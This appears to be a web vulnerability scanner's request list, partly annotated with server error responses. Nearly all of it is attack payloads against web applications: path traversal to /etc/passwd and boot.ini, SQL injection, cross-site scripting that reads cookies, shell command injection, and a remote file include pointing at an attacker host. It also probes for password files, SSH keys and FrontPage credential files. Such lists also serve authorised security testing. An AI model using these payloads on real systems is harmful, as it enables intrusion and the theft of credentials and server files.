forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=268
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=100
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
functions.inc.php+
get_od_toc.pl
globals.php3
globals.pl
Gozila.cgi
helperfunction.php
homebet/homebet.dll?form=menu&amp;option=menu-signin
htmltonuke.php
idealbb/error.asp?|-|0|404_Object_Not_Found
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
include/customize.php
include/help.php
includes/footer.php3
includes/header.php3
index.php?base=test%20
index.php?IDAdmin=test
index.php?pymembs=admin
index.php?SqlQuery=test%20
index.php?tampon=test%20
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos/services/index.asp
instaboard/index.cfm
intranet/browse.php
invitefriends.php3
ipchat.php
ixmail_netattach.php
jsptest.jsp+
kernel/class/delete.php
kernel/classes/ezrole.php
ldap.search.php3?ldap_serv=nonsense%20
livredor/index.php
login.php3?reason=chpass2%20
mail/include.html
mail/settings.html
mail/src/read_body.php
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mambo/banners.php
manage/login.asp+
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
members/ID.pm
members/ID.xbb
mod.php
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=/etc/passwd%00
modif_infos.asp?n=c:\boot.ini
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Search/index.php
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moregroupware/modules/webmail2/inc/
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
netget?sid=Safety&amp;msg=2002&amp;file=Safety
newtopic.php
nphp/nphpd.php
OpenTopic
options.inc.php+
oscommerce/default.php
parse_xml.cgi
php/gaestebuch/admin/index.php
php/php4ts.dll
pks/lookup
pm/lib.inc.php
poppassd.php3+
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
product_info.php
prometheus-all/index.php
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protection.php
pt_config.inc
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/del.php?pollorder=1%20
quikmail/nph-emumail.cgi?type=../%00
room/save_item.php
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
screen.php
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
security/web_access.html
sendphoto.php
servers/link.cgi
setpasswd.cgi
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
Site/biztalkhttpreceive.dll
site_searcher.cgi
spelling.php3+
squirrelmail/src/read_body.php
staticpages/index.php
status.php3
supporter/index.php
supporter/tupdate.php
sw000.asp?|-|0|404_Object_Not_Found
syslog.htm?%20
technote/print.cgi
texis/websearch/phine
tinymsg.php
tmp_view.php?file=/etc/passwd
topic/entete.php
topsitesdir/edit.php
ttforum/index.php
tutos/file/file_new.php
tutos/file/file_select.php
typo3/typo3/dev/translations.php
uifc/MultFileUploadHandler.php+
url.jsp
useraction.php3
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
utils/sprc.asp+
vars.inc+
VBZooM/add-subject.php
wbboard/profile.php
wbboard/reply.php
webcalendar/login.php
webcalendar/view_m.php
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
web_app/WEB-INF/webapp.properties
XMBforum/buddy.php
XMBforum/member.php
x_stat_admin.php
yabbse/Reminder.php
yabbse/Sources/Packages.php
zentrack/index.php
_head.php
cgi-bin/adduser.cgi
cgi-bin/amadmin.pl
cgi-bin/anyboard.cgi
cgi-bin/AT-generate.cgi
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/awl/auctionweaver.pl
cgi-bin/bb-ack.sh
cgi-bin/bb-histlog.sh
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bbs_forum.cgi
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/cached_feed.cgi
cgi-bin/calender_admin.pl
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/cgforum.cgi
cgi-bin/change-your-password.pl
cgi-bin/clickresponder.pl
cgi-bin/commandit.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/csNews.cgi
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/cutecast/members/
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db_manager.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/majordomo.pl
cgi-bin/mojo/mojo.cgi
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/non-existent.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/parse-file
cgi-bin/php-cgi
cgi-bin/pollssi.cgi
cgi-bin/postcards.cgi
cgi-bin/profile.cgi
cgi-bin/quikstore.cfg
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rmp_query
cgi-bin/robpoll.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/statusconfig.pl
cgi-bin/sws/manager.pl
cgi-bin/texis/phine
cgi-bin/Upload.pl
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/cfgwiz.exe
cgi-bin/Cgitest.exe
cgi-bin/mailform.exe
cgi-bin/ms_proxy_auth_query/
cgi-bin/post16.exe
oem_webstage/oem.conf
database/
demo/sql/index.jsp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.passwd
.wwwacl
.www_acl
cgi-bin/.wwwacl
cgi-bin/.www_acl
.htpasswd
.access
.addressbook
.bashrc
.bash_history
.forward
.history
.htaccess
.lynx_cookies
.mysql_history
.passwd
.pinerc
.plan
.proclog
.procmailrc
.profile
.rhosts
.sh_history
.ssh
.ssh/authorized_keys
.ssh/known_hosts
cgi-bin/ls
///../../data/config/microsrv.cfg
///////../../../../../../etc/passwd
_vti_bin/shtml.exe/_vti_rpc
doc/rt/overview-summary.html
docs/sdb/en/html/index.html
jservdocs/
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/Language.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/realPath.jsp
tomcat-docs/index.html
cgi-bin/test-cgi.bat
akopia/
bc4j.html
dms0
jspdocs/
mod_ose_docs
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
oprocmgr-status
php/index.php
pls/portal30/admin_/
pls/simpledad/admin_/
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
search/
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admisapi/fpadmin.htm
bin/admin.pl
bin/cfgwiz.exe
bin/CGImail.exe
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
cgi-bin/CGImail.exe
cgi-bin/contents.htm
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
scripts/admin.pl
scripts/cfgwiz.exe
scripts/CGImail.exe
scripts/contents.htm
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
_private/
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_private/_vti_cnf/
_vti_bin/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/CGImail.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/_vti_cnf/
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/users.pwd
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
examples/
examples/context
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
help/contents.htm
help/home.html
manual/ag/esperfrm.htm
nethome/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
servlet/AdminServlet
servlet/gwmonitor
servlet/PrintServlet
servlet/SearchServlet
servlet/ServletManager
servlet/sq1cdsn
servlet/sqlcdsn
servlet/webacc
servlet/webpub
WebSphereSamples
cgi-bin/cgi-test.exe
doc/domguide.nsf
doc/dspug.nsf
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc/internet.nsf
doc/javapg.nsf
doc/lccon.nsf
doc/migrate.nsf
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/readmec.nsf
doc/readmes.nsf
doc/smhelp.nsf
doc/srvinst.nsf
domguide.nsf
dspug.nsf
help/domguide.nsf
help/dspug.nsf
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
help4.nsf
helpadmin.nsf
helplt4.nsf
internet.nsf
javapg.nsf
lccon.nsf
migrate.nsf
npn_admn.nsf
npn_rn.nsf
readmec.nsf
readmes.nsf
smhelp.nsf
srvinst.nsf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
netbasic/websinfo.bas
perl/env.pl
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
test
iissamples/issamples/codebrws.asp
iissamples/issamples/ixqlang.htm
iissamples/issamples/Winmsdp.exe
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/Winmsdp.exe
mc-icons/
ns-icons/
cgi-bin/printenv
cgi-bin/test-cgi
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
test.php
test/info.php
info.php
test/phpinfo.php
NetDetector/middle_help_intro.htm
a/
basilix/
bottom.html
interchange/
sca/menu.jsp
icons/
manual/images/
doc/packages/
image/
javax
perl/
scripts
SUNWmc/htdocs/en_US/
search/inc/
images/
docs/
style/
styles/
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
uploader.php
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/exair/howitworks/Winmsdp.exe
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
conspass.chl+
consport.chl+
general.chl+
srvstatus.chl+
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
search.asp?Search=
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
NULL.printer
nul..cfm
nul..dbm
nul.cfm
nul.dbm
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/htimage.exe
mlog.html
mlog.phtml
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
i?/etc/passwd
cfide/administrator/index.cfm
CFIDE/administrator/index.cfm
directory.php?dir=%3Bcat%20/etc/passwd
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
soapConfig.xml
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
XSQLConfig.xml
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
docs/<script>alert('Vulnerable');</script>
docs/NED?action=retrieve&location=.
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
lcgi/ndsobj.nlm
surf/scwebusers
_vti_bin/fpcount.exe
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
scripts/tools/getdrvrs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/vote.cgi
cgi-bin/quizme.cgi
shop/normal_html.cgi?file=../../../../../../etc/issue%00
